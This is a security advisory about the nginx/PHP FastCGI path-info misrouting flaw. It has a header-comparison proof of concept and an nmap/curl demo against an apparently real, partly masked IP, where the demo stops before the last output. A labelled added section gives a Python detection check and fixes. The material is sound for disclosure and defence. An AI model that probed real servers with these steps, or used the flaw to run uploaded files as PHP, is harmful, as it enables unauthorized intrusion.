
Nginx Security Law

Please check your server.

http://www.80sec.com/nginx-securit.html

http://www.80sec.com/iis-cgifastcgi-security-hol.html

PoC:

Access http://testsite/robots.txt

HTTP/1.1 200 OK
Server: nginx/0.6.32
Date: Thu, 20 May 2010 10:05:30 GMT
Content-Type: text/plain
Content-Length: 18
Last-Modified: Thu, 20 May 2010 06:26:34 GMT
Connection: keep-alive
Keep-Alive: timeout=20
Accept-Ranges: bytes

Access http://testsite/robots.txt/80sec.php

Date: Thu, 20 May 2010 10:06:49 GMT
Content-Type: text/html
Transfer-Encoding: chunked
X-Powered-By: PHP/5.2.6

The change in Content-Type shows that a different backend handled the second request (the static file path was passed to the PHP interpreter), so the site is likely vulnerable.

Demo:

pentest@ubuntu:~$ nmap -sV -p 80 218.xx.xx.205

Interesting ports on 218.xx.xx.205:

PORT   STATE SERVICE VERSION

80/tcp open  http    nginx web server 0.8.15

pentest@ubuntu:~$ curl --head http://218.xx.xx.205/images/intro.png -# | grep "Content-Type"

0.0%

Content-Type: image/png

pentest@ubuntu:~$ curl --head http://218.xx.xx.205/images/intro.png/test.php -# | grep "Content-Type"
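An added example (not from the original post) of the same check done offline: it parses two response heads, the static file's and the probe's, and flags the Content-Type shift described above, while treating a non-200 probe answer as safe. The sample heads and the marker name are constructed for the example.

```python
# Constructed samples: the two response heads quoted in the post (the probe
# head has no status line there, so its status is unknown) plus a hypothetical
# head from a fixed server that answers the probe with nginx's own 404 page.
SAMPLE_STATIC = """HTTP/1.1 200 OK
Server: nginx/0.6.32
Content-Type: text/plain
Content-Length: 18
"""
SAMPLE_PROBE = """Content-Type: text/html
Transfer-Encoding: chunked
X-Powered-By: PHP/5.2.6
"""
SAMPLE_FIXED = """HTTP/1.1 404 Not Found
Server: nginx/0.6.32
Content-Type: text/html
"""


def parse_head(raw):
    """Raw response head -> dict of lower-cased headers; status code under 'status'."""
    lines = [ln for ln in raw.strip().splitlines() if ln.strip()]
    headers = {"status": None}
    if lines and lines[0].upper().startswith("HTTP/"):
        parts = lines.pop(0).split()
        headers["status"] = int(parts[1]) if len(parts) > 1 and parts[1].isdigit() else None
    for ln in lines:
        name, sep, value = ln.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers

def media_type(headers):
    """Content-Type without parameters: 'text/html; charset=utf-8' -> 'text/html'."""
    return headers.get("content-type", "").split(";")[0].strip().lower()

def probe_url(static_url, marker="pathinfo-check"):
    """Static file URL with a bogus .php segment appended, as in the post."""
    return static_url.rstrip("/") + "/" + marker + ".php"

def pathinfo_misrouted(static, probe):
    """True when the probe response shows the request reached PHP and succeeded.
    A non-200 probe (nginx's 404, or PHP's own 404 once cgi.fix_pathinfo=0 is
    set) is not flagged even though its Content-Type is also text/html."""
    if probe["status"] is not None and probe["status"] != 200:
        return False
    if probe.get("x-powered-by", "").lower().startswith("php"):
        return True
    return media_type(probe) == "text/html" and media_type(probe) != media_type(static)
```

For a live run, capture both heads with `curl --head` as in the demo above and feed them to `parse_head`. If the check flags your server, set `cgi.fix_pathinfo=0` in php.ini or add `try_files $uri =404;` to the PHP location block so nginx stops forwarding non-existent scripts to FastCGI.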

